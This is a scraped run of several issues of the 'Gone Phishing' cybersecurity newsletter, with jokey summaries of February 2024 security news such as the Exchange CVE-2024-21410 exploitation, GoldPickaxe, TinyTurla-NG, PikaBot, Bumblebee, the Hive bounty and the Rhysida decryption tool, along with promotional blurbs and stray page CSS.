  • Microsoft Outlook Code Execution

Better luck next time! ๐Ÿ˜ฌ Exchange Server exploited day after patchโ€ฆ

๐Ÿšจ Critical Exchange Server Flaw Exploited in the Wild! ๐Ÿšจ

Microsoft has confirmed active exploitation of a critical security flaw in Exchange Server, tracked as CVE-2024-21410 (CVSS: 9.8), just a day after releasing patches as part of its Patch Tuesday updates. ๐Ÿ›ก๏ธ This flaw allows attackers to escalate privileges, potentially compromising Exchange servers. ๐Ÿ˜ฑ

๐Ÿ” Key Details

  • Attackers can exploit an NTLM credentials-leaking vulnerability in Outlook to gain privileges on the Exchange server.

  • Redmond warns that successful exploitation enables attackers to authenticate as users and perform malicious operations.

  • Microsoft has enhanced protection with Extended Protection for Authentication (EPA) enabled by default in Exchange Server 2019 CU14.

๐ŸŒ Potential Threat Actors

While specific details of exploitation are unclear, Russian state-affiliated groups like APT28 have a history of similar attacks.

Trend Micro implicates APT28 in NTLM relay attacks targeting various high-value sectors since April 2022.

Stay vigilant and update systems promptly! ๐Ÿ’ป๐Ÿ”’

Now, on to todayโ€™s hottest cybersecurity stories:

  • ๐ŸŽญย Deepfakes employed by Chinese hackers in mobile banking attacks ๐Ÿ“ฑ

  • ๐Ÿšจ UPDATE: Atlassian vulnerability to blame in Januaryโ€™s GAO breach

  • ๐Ÿ‘‹ Move over Turla. Meet Tiny Turla, coming to a Polish NGO near you ๐Ÿ‘€

You heard about the Chinese godfather? He made them an offer they couldn't understand ๐Ÿ˜๐Ÿ˜๐Ÿ˜

๐Ÿ“ฑ GoldFactory: Masterminds Behind Sophisticated Mobile Banking Trojans ๐ŸŽ

A Chinese-speaking threat actor group known as GoldFactory has been identified as the brains behind highly advanced banking trojans, including a newly discovered iOS malware named GoldPickaxe. ๐Ÿ›ก๏ธ

GoldPickaxe targets both iOS and Android platforms, gathering identity documents, facial recognition data, and intercepting SMS messages. The group is believed to have close ties to Gigabud and has been active since mid-2023, primarily targeting the Asia-Pacific region, particularly Thailand and Vietnam. ๐ŸŒ

This sophisticated malware is distributed through smishing and phishing campaigns, with Android variants often hosted on counterfeit websites mimicking Google Play Store pages. The iOS version utilises Apple's TestFlight platform and booby-trapped URLs to trick users into downloading rogue apps. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Notably, GoldPickaxe for iOS sidesteps security measures, including facial recognition for transaction confirmation, by using deepfake videos created from victim recordings. Both Android and iOS variants collect ID documents, intercept SMS messages, and proxy traffic, potentially enabling unauthorised fund transfers. ๐Ÿ’ณ

While the iOS variant is limited due to Apple's closed ecosystem, the Android version, an evolution of GoldDiggerPlus, targets over 20 applications to steal credentials. It abuses Android's accessibility services to log keystrokes and extract on-screen content. ๐Ÿ“Š

GoldFactory's arsenal also includes GoldDigger, which targets Vietnamese financial apps, and GoldKefu, an embedded trojan used in conjunction with GoldDiggerPlus to steal banking credentials. These trojans employ various tactics like fake overlays and fake bank alerts to deceive victims. ๐Ÿšจ

To mitigate these threats, users are advised to avoid clicking on suspicious links, install apps only from trusted sources, and review app permissions regularly. GoldFactory's operational sophistication underscores the evolving landscape of mobile malware and the need for heightened cybersecurity measures. ๐Ÿ“ต๐Ÿ”’

They finally got to the bottom of it, At long Lassian ๐Ÿ‘€

๐Ÿ”’ Government Accountability Office (GAO) Breach โš ๏ธ

The Government Accountability Office (GAO) recently suffered a data breach affecting thousands of current and former employees, along with some affiliated companies, due to a vulnerability in the Atlassian Confluence workforce collaboration tool. ๐Ÿ›ก๏ธ

The breach, disclosed by GAO contractor CGI Federal, impacted approximately 6,600 individuals, primarily GAO employees from 2007 to 2017. The vulnerability, actively exploited by malicious actors, allowed unauthorised access to victim systems even after patching. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Despite a CISA advisory in October warning of the vulnerability, there was a three-month gap before GAO was notified in January 2024. CGI Federal has since taken remediation actions and is collaborating with authorities to address the breach. ๐Ÿ“…

Atlassian, the provider of Confluence, alerted customers promptly and emphasised the importance of immediate action to safeguard data. The GAO is conducting an investigation into the breach's cause and plans to provide identity theft monitoring services to affected individuals. ๐Ÿ’ผ

This incident underscores the critical importance of timely vulnerability management and proactive cybersecurity measures to protect sensitive data from evolving threats. ๐Ÿšจ๐Ÿ”

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

NGOh-no! ๐Ÿ™ˆ

๐Ÿ” Turla Threat Actor Strikes with TinyTurla-NG Backdoor ๐Ÿšช

A recent campaign targeting Polish non-governmental organisations has shed light on the activities of the Russia-linked threat actor Turla, known for its association with the Federal Security Service (FSB). ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Cisco Talos has uncovered a new backdoor dubbed TinyTurla-NG, reminiscent of the previously documented TinyTurla implant. These "last chance" backdoors serve as a failsafe for the threat actor when other access methods have been compromised or detected. ๐Ÿ›ก๏ธ

This sophisticated actor, also known by various aliases, including Iron Hunter and Snake, has a history of targeting defence sectors in Ukraine and Eastern Europe. In this latest campaign, TinyTurla-NG was observed in operation from December 2023 to January 2024, leveraging compromised WordPress sites as command-and-control servers. ๐ŸŒ

The backdoor allows for remote command execution via PowerShell or Command Prompt, facilitating the download and upload of files as well as the execution of malicious scripts. Particularly concerning is the deployment of PowerShell scripts like TurlaPower-NG, designed to extract sensitive password database information from popular password management software. ๐Ÿšจ

This revelation coincides with reports of Russian nation-state actors exploring advanced AI tools, including large language models like ChatGPT, to delve into satellite communication protocols and radar imaging technologies. ๐Ÿ›ฐ๏ธ

As threat actors continue to evolve their tactics, organisations must remain vigilant and bolster their cybersecurity defences to safeguard against sophisticated cyber threats. ๐Ÿ”’๐Ÿ”Ž

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter
  • ๐ŸŒต CACTUS ransomware exploits flaws in Qlik Sense ๐Ÿ’ป

Prudential Financial suffers breach in data theft cyber attack

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that never misses a beat, a beep, or a tweet when it comes to all things cyber ๐Ÿฆธ

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿฆ Prudential Financial suffers breach in data theft cyber attack โšก

  • ๐Ÿ‘ค DarkMe infects Microsoft Smartscreen flaw, victimises traders ๐Ÿ’ฑ

  • โš ๏ธ Donโ€™t be fooled by โ€˜command-not-foundโ€™ tool sweeping Ubuntu ๐Ÿ‘จโ€๐Ÿ’ป

Wasnโ€™t very Prudent, was itโ€ฆ ๐Ÿ‘€๐Ÿ˜ฌ๐Ÿ’€

๐Ÿฆ Prudential Financial Breach: Employee and Contractor Data Compromised ๐Ÿ›ก๏ธ

Prudential Financial, a global financial services giant managing $1.4 trillion in assets, reported a network breach last week. ๐ŸŒ

Attackers accessed some systems on February 4th, but Prudential detected and blocked them by February 5th. ๐Ÿ”’

The breach affected administrative and user data, including accounts linked to employees and contractors. Prudential suspects a cybercrime group behind the intrusion. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Although the breach hasn't impacted operations yet, Prudential notified authorities and initiated an investigation. They haven't found evidence of customer data compromise so far. ๐Ÿ’ผ

This incident follows a similar breach in May 2023, where over 320,000 customer records were exposed due to a breach in a third-party vendor's platform. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Prudential continues to investigate, emphasising its commitment to data security and customer privacy. Stay tuned for further updates. ๐Ÿšจ๐Ÿ”

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

#DarkMeToo ๐Ÿ™ƒ

๐Ÿ”“ Zero-Day Exploit in Microsoft Defender SmartScreen Exploited by Water Hydra ๐Ÿ’ป

A newly disclosed security flaw in Microsoft Defender SmartScreen has been exploited by an advanced persistent threat actor, Water Hydra, targeting financial market traders. ๐ŸŽฏ

The flaw, CVE-2024-21412, allows attackers to bypass security checks by sending victims a specially crafted file, convincing them to click on it. ๐Ÿ’ผ

Trend Micro tracked the campaign since late December 2023, documenting the use of the exploit to distribute DarkMe malware via a booby-trapped URL in forex trading forums. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

The attack cleverly abuses the search application protocol, leveraging a chain of internet shortcut files to evade SmartScreen detection. ๐Ÿ˜ˆ

Despite Microsoft addressing the flaw in its February Patch Tuesday update, the incident highlights the growing sophistication of cybercrime groups and the increasing risk of zero-day exploits being incorporated into advanced attack chains. ๐Ÿ›ก๏ธ

Stay vigilant and ensure your systems are up-to-date to mitigate such threats. ๐Ÿšจ๐Ÿ”

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

Ubuntu forget but you ought to remember ๐Ÿ˜๐Ÿ˜๐Ÿ˜

๐Ÿ” Ubuntu Systems Vulnerable to Rogue Package Recommendations ๐ŸŽ

Cybersecurity researchers have discovered a potential vulnerability in Ubuntu's "command-not-found" utility, which could allow threat actors to recommend malicious packages, compromising systems running the Ubuntu operating system. ๐Ÿง

The utility, installed by default on Ubuntu systems, suggests packages to install when users attempt to run unavailable commands. Attackers could manipulate this system to recommend their own rogue packages from the snap repository, potentially leading to software supply chain attacks. ๐Ÿ›ก๏ธ

Aqua found a loophole where the alias mechanism can be exploited to register a snap name associated with an alias, tricking users into installing malicious packages. Furthermore, legitimate APT package commands could be impersonated by malicious actors, with as many as 26% of APT package commands vulnerable to impersonation. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

To mitigate this risk, users are advised to verify package sources before installation, while developers of APT and snap packages should register associated snap names to prevent misuse. Vigilance and proactive defence strategies are crucial in light of this threat. ๐Ÿšจ๐Ÿ”’

Thatโ€™s all for today, folks. Donโ€™t be thick when you click ๐Ÿ˜‚๐Ÿ‘Œ

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

PikaBot has reared its ugly head

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that canโ€™t wait until cybercrime is sooooo last season #NewYorkFashionWeek ๐Ÿฉฑ๐Ÿ‘ ๐Ÿ‘ž๐Ÿฅฝ๐Ÿ™ƒ

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ™ˆ PikaBot has reared its ugly head again with new code, tactics โ™Ÿ๏ธ

  • ๐Ÿค– Glupteba botnet uses mysterious UEFI bootkit to hide in plaintext ๐ŸŽญ

  • ๐Ÿ Bumblebee malware is once again a buzzing hive of cyber activity ๐Ÿฏ

Phew, the coast is clearโ€ฆ PikaBOT!!! ๐Ÿ’€๐Ÿ’€๐Ÿ’€

๐Ÿšจ PikaBot Malware: Devolution Detected ๐Ÿ”

The PikaBot malware, first spotted in May 2023, has undergone significant changes, described as a "devolution" by Zscaler ThreatLabz researcher Nikolaos Pantazopoulos. ๐Ÿ› ๏ธ

In a recent analysis, researchers found that PikaBot's latest version (1.18.32) has simplified its code and network communications. This includes dropping advanced obfuscation techniques and opting for simpler encryption algorithms. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Notably, PikaBot now stores its entire bot configuration in plaintext, a departure from previous encryption methods. Additionally, modifications to its command-and-control (C2) server communications were observed. ๐Ÿ“ก

Despite recent inactivity, PikaBot remains a potent cyber threat, evolving constantly. However, developers seem to be favouring a less complex approach, removing advanced obfuscation features. ๐Ÿ”’

This development coincides with warnings about an ongoing cloud account takeover (ATO) campaign targeting Microsoft Azure environments, compromising hundreds of user accounts. ๐Ÿšจ

As cyber threats evolve, vigilance and proactive security measures are crucial to safeguarding against emerging risks. Stay updated and stay safe! ๐Ÿ›ก๏ธ๐Ÿ”

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

UEFI Bootkit: These arenโ€™t the bots youโ€™re looking for ๐Ÿ˜ตโ€๐Ÿ’ซ๐Ÿ’€ย 

๐Ÿšจ Glupteba Botnet: Adding UEFI Bootkit for Stealth ๐Ÿ”

Recent analysis by Palo Alto Networks Unit 42 researchers uncovered a new twist in the Glupteba botnet saga: the integration of an undocumented Unified Extensible Firmware Interface (UEFI) bootkit feature. ๐Ÿ› ๏ธ

This bootkit grants Glupteba the ability to control the operating system boot process, making detection and removal incredibly challenging. It enhances the malware's persistence and stealth capabilities, further complicating defence efforts. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Glupteba is already a formidable threat, functioning as an information stealer, backdoor, and cryptocurrency miner. โ›๏ธ It leverages the Bitcoin blockchain for resilient command-and-control (C2) operations, making it difficult to dismantle. ๐Ÿ’ผ๐Ÿ’ฐ

Notably, Glupteba's distribution involves complex infection chains, often starting with PrivateLoader or SmokeLoader infections that pave the way for subsequent malware families, ultimately leading to Glupteba. ๐Ÿ”„

This sophisticated malware ecosystem has evolved over the years, with Glupteba now incorporating a UEFI bootkit to disable security features like PatchGuard and Driver Signature Enforcement (DSE) during boot-up. ๐Ÿšซ

The researchers emphasised the malware's adaptability and innovation, highlighting its role in mass infections and collaboration within the cybercriminal ecosystem. Glupteba continues to pose a significant threat, showcasing the evolving landscape of modern cybercrime. ๐ŸŒ๐Ÿ”’

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

Hackers be like float like a butterfly, sting like a Bumblebee ๐Ÿ

๐Ÿšจ Bumblebee Malware Buzzes Back with Fresh Tactics ๐Ÿ

After a four-month hiatus, Bumblebee malware has reappeared on the cyber threat landscape, sporting a revamped attack chain, according to recent findings. ๐Ÿ”„

The latest campaign, observed in February 2024, showcases a "significantly different" modus operandi compared to previous infiltrations, coinciding with the return of notorious threat actors following a winter lull. โ„๏ธ

Bumblebee, a sophisticated downloader, serves as an initial access broker, facilitating the download and execution of payloads like Cobalt Strike, shellcode, Sliver, and Meterpreter. ๐ŸŽฏ

Throughout March 2022 to October 2023, a whopping 230 Bumblebee campaigns were documented, with threat actors leveraging creative distribution methods, including trojanizing popular software tools like Zoom and Cisco AnyConnect. ๐Ÿš€

In this latest iteration, social engineering tactics take centre stage, with attackers enticing victims to download Bumblebee via emails spoofed from consumer electronics firm Humane. ๐Ÿ“ง

The bait? A voicemail-themed lure embedded with OneDrive URLs leading to Word documents containing VBA macro-enabled scripts. ๐Ÿ“ž

Once executed, the script triggers a PowerShell command fetching the next stage of the attack from a remote server, ultimately leading to the deployment of the Bumblebee DLL. ๐Ÿ’ป

What's noteworthy is the resurgence of VBA macro-enabled documents in the attack chain, a deviation from recent trends observed. ๐Ÿ”

While the campaign remains unattributed, similarities in techniques suggest a possible connection to the TA579 group. Other tracked threat actors, like TA577, have also resumed activities, signalling a return to high operational tempo in 2024. โฐ

As cybercriminals ramp up their efforts, we anticipate a continuation of these trends, urging heightened vigilance and proactive defence measures in the face of evolving threats. ๐Ÿ›ก๏ธ๐Ÿ”’

Stay safe out there, folks!

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

$10M bounty offered by U.S for the capture of Hive ransomware leaders

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that wonders whether the hackers could get from London to New York with no ticket or passport ๐Ÿค”๐Ÿ‘€๐Ÿ˜‚

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ’ฐ $10M bounty offered by U.S. for info Hive ransomware leaders ๐Ÿฏ

  • ๐ŸŽ‰ Yay! Decryption tool released to dismantle Rhysida ransomware ๐Ÿ’ธ

  • ๐ŸŸ๏ธ CISA, OpenSSF release framework for package repository security ๐Ÿ›ก๏ธ

Thatโ€™s quite the honey pot ๐Ÿฏ But itโ€™s none of our beeswax ๐Ÿ

๐Ÿšจ๐Ÿ’ฐ U.S. Offers Up to $10 Million Bounty for Hive Ransomware Operatives ๐Ÿ’ฐ๐Ÿšจ

The U.S. Department of State has announced staggering monetary rewards of up to $10 million for information leading to the identification of individuals holding critical positions within the Hive ransomware operation. Additionally, an extra $5 million bounty awaits those providing actionable specifics that could lead to the arrest or conviction of individuals involved in Hive ransomware activity.

This announcement comes on the heels of a significant law enforcement effort that successfully infiltrated and dismantled the darknet infrastructure linked to the Hive ransomware-as-a-service (RaaS) gang over a year ago. The operation resulted in the arrest of one suspect in Paris in December 2023.

Hive, which surfaced in mid-2021, targeted over 1,500 victims across 80 countries, amassing approximately $100 million in illicit gains. ๐ŸŒ Following the takedown, a new ransomware group dubbed Hunters International emerged, acquiring Hive's source code and infrastructure to kick-start its own nefarious operations.

Evidence suggests that Hunters International may have ties to Nigeria, possibly linked to an individual named Olowo Kehinde. However, the true origins remain obscured, potentially pointing to a sophisticated cover-up.

The surge in ransomware activity in 2023, as highlighted by blockchain analytics firm Chainalysis, underscores the growing threat posed by cybercriminals. With a resurgence in attacks and a surge in new entrants to the ransomware ecosystem, the landscape has become increasingly perilous.

Amidst these challenges, cybersecurity experts emphasise the importance of vigilance and rapid response strategies to mitigate the impact of zero-day exploits and swiftly combat emerging threats. ๐Ÿ›ก๏ธ๐Ÿ”๐ŸŒ๐Ÿ’ป

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

I Rhysida but I donโ€™t believe her ๐Ÿ˜

๐Ÿ”“โœจ Implementation Vulnerability Exposes Rhysida Ransomware's Weakness โœจ๐Ÿ”“

Cybersecurity researchers from Kookmin University and the Korea Internet and Security Agency (KISA) have achieved a significant breakthrough in the fight against ransomware. Their discovery of an "implementation vulnerability" in Rhysida ransomware has enabled the successful reconstruction of encryption keys, leading to the decryption of locked data.

The findings, published recently, mark the first successful decryption of Rhysida ransomware since its emergence in May 2023. A recovery tool developed as a result of this breakthrough is now being distributed by KISA, offering hope to victims of this malicious software.

This breakthrough is part of a growing trend in the cybersecurity community, where researchers have been successful in decrypting ransomware by exploiting implementation vulnerabilities. Rhysida joins the ranks of ransomware strains such as Magniber v2, Ragnar Locker, Avaddon, and Hive, which have been decrypted using similar methods.

Rhysida ransomware, known for its ties to the Vice Society ransomware crew, employs a double extortion tactic to coerce victims into paying by threatening to release their stolen data. Targeting sectors such as education, manufacturing, information technology, and government, Rhysida has been flagged by the U.S. government for opportunistic attacks.

A detailed analysis of Rhysida's encryption process reveals its use of LibTomCrypt and parallel processing to accelerate encryption. The ransomware also employs intermittent encryption techniques to evade detection by security solutions.

Key to the researchers' success was the discovery of Rhysida's use of a cryptographically secure pseudo-random number generator (CSPRNG) based on the ChaCha20 algorithm. By understanding the encryption process and the generation of random numbers correlated to the ransomware's runtime, the researchers were able to reverse-engineer the encryption key and decrypt the files.

While the scope of these decryption efforts may be limited, they offer hope and valuable insights into combating ransomware threats. With continued research and collaboration, the cybersecurity community can continue to develop tools and strategies to mitigate the impact of ransomware attacks. ๐Ÿ”๐Ÿ’ป๐Ÿ›ก๏ธ๐Ÿ”

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

Do you CISA what weโ€™re packing? ๐Ÿ’€

๐Ÿ”’ Strengthening Open-Source Security: New Framework by CISA and OpenSSF ๐Ÿ”’

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has teamed up with the Open Source Security Foundation (OpenSSF) to introduce the Principles for Package Repository Security. ๐Ÿ›ก๏ธ This framework aims to enhance security in open-source software ecosystems by providing guidelines for package managers.

It outlines four security maturity levels, ranging from basic measures like multi-factor authentication to advanced protocols such as requiring MFA for all maintainers. ๐Ÿ’ป Authors emphasise achieving at least Level 1 maturity for all package repositories.

This initiative responds to concerns raised by the U.S. Department of Health and Human Services about security risks in healthcare systems due to open-source software vulnerabilities. ๐Ÿ‘ฉโ€โš•๏ธ๐Ÿ”

By promoting collaboration and sharing best practices, the framework aims to safeguard critical software infrastructure and mitigate emerging cyber threats. ๐ŸŒ๐Ÿ›ก๏ธ๐Ÿ’ก

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

Raspberry Robin malware spreading on Discord

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

